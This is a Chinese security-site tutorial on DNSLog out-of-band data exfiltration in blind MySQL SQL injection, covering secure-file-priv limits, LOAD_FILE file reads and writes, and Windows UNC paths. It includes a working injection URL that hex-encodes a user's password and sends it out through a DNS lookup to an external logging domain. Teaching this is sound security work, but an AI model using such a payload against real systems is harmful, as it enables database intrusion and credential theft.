freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

DNSLog在MySQL注入中的实战
白垩之子 2021-02-25 00:59:29 506740

关于DNSlog在Web攻击的利用

简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候可以通过DNSlog这种方式把想获得的数据外带出来。

常用在哪些情况下

  1. SQL注入中的盲注

  2. 无回显的命令执行

  3. 无回显的SSRF

DNSlog攻击的基本原理

dnllog原理图

作为攻击者,提交注入语句,让数据库把需要查询的值和域名拼接起来,然后发生DNS查询,我们只要能获得DNS日志,就得到了想要的值。所以我们需要有一个自己的域名,然后再域名商处配置一条NS记录,然后我们在NS服务器上获取DNS日志即可。

DNSLOG在MySQL数据库中SQL注入的实战

本次演示一个最常见的注入场景,就是WHERE后面条件处的注入。实验环境有一个test_user表,三个字段id、user、pass。如下

iduserpass
1adminadmin123

最后就不再自己搭建一个DNS服务器了,直接用ceye.io这个平台,这个平台就集成了Dnslog的功能。

需要条件

  1. MySQL开启load_file()

  2. DNSLog平台(hyugaCEYE

  3. Windows平台

Mysql服务端文件读写

条件:服务端配置可读写目录和正确的用户权限。

安全保护

mysql服务端的文件读取有很多的条件限制,主要是mysql数据库的配置,为了安全原因,当读取位于服务器上的文本文件时,文件必须处于数据库目录可被所有人读取。你可以通过执行show variables like '%secure%'来查看。

secure-file-priv参数是用来限制LOAD DATA,SELECT ... OUTFILE,DUMPFILELOAD_FILE()可以操作的文件夹。

secure-file-priv的值可以分为三种情况:

  1. secure-file-priv的值为null,表示显示mysqld不允许导入|导出

  2. secure-file-priv的值为/tmp/,表示限制mysqld的导入|导出只能发生在/tmp/目录下,此时如果读写发生在其他文件夹中,就会报错

  3. secure-file-priv的值没有具体值,表示不对mysqld的导入|导出做限制。

除此之外,读取或写入文件必须拥有可操作的用户权限否则会报错。

ERROR 1045 (28000): Access denied for user

读取文件

SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;
create database test;
create table test (id TEXT, content TEXT);
load data infile "/var/lib/mysql-files/aaa" into table test.test FIELDS TERMINATED BY '\n\r';

写入文件

select group_concat(id) from test INTO DUMPFILE "/var/lib/mysql-files/aaaaa";


load_file

MySQL应该是在实战中利用DNSLOG最多的。

在MySQL中,有一个load_file函数可以用来读取本地的文件。

http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(concat('\\\\',(SELECT hex(pass) FROM test.test_user WHERE user='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\\abc'))

可以看到test_user中的pass字段的值的Hex码就被查询出来了,为什么这个地方Hex编码的目的就是减少干扰,因为很多时候数据库字段的值可能是有特殊符号的,这些特殊符号拼接在域名里是无法做DNS查询的,因为域名有一定的规范,有些特殊符号是不能带入的。

注意:load_file函数再Linux下是无法用来做DNSLOG攻击的,因为这里就涉及到Windows的UNC路径。

UNC路径

百度的UNC路径的解释

UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。

其实我们平常在Windows中用共享文件的时候就会用到这种网络地址的形式

\\sss.xxx\test\

这也就解释了为什么CONCAT()函数拼接了4个\了,因为转义的原因,4个\就变成了2个\,目的就是利用UNC路径。

因为Linux没有UNC路径这个东西,所以当MySQL处理Linux系统中的时候,是不能用这种方式外带数据的。

总结

  1. 有些函数的使用受操作系统的限制

  2. DNS查询有长度限制,所以必要的时候需要对查询结果做字符串的切割

  3. 避免一些特殊符号的产生,最好的选择就是数据先编码再带出

  4. 注意不同的数据库的语法是有差异的,特别是在数据库拼接的时候

  5. 有些操作是需要较高权限的

参考文献:

Dnslog在SQL注入中的实战

DNSLog 数据外带

# SQL注入 # web安全 # dnslog平台
本文为 白垩之子 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
winhex的安全学习之路
白垩之子 LV.3
为什么Freebuf不能注销账号?
  • 14 文章数
  • 39 关注者
xray常用命令,漏洞扫描时使用的代理(http proxy)和上游代理(mitm upstream_proxy)的实战应用
2021-07-20
PHP反序列化漏洞的原理及复现
2021-03-12
SSRF的利用方式
2021-03-10
文章目录